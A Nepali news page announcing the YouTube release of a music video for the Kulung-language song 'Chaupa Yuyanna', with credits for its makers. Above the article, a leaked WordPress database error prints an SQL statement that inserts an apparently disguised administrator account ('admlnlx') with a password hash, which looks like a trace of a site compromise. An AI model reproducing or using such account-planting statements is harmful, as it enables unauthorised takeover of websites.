WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BE3lhu5rrxScebrv013HvinVuzov1b0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 04:13:37', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, काठमाण्डौ । कुलुङ भाषाको नयाँ गीत ‘चौपा यूयान्ना’ (मुटुमा राखेर) गीतको म्युजिक भिडियो सार्वजनिक भएको छ । समिना कुलुङको श्ब्द
डक्टर किरातको संगित र लहंग सुब्बाको संगीत सम्योजनमा रहेको छ भने स्वार उदय सोताङ र मेलिना राईको रहेको छ ।
आईतवार युटुबमार्फत सार्वजनिक गीतको म्युजिक भिडियोमा फिचरिङ्ग टङ्क होङेलु र सोन पालुङ्वको रहेको छ । भिडियोमा निर्देशन राजेश पुमा राईको रहेको छ भने छायाङकन उत्सब दाहाल र सम्पादन बिकास दहालको रहेको छ ।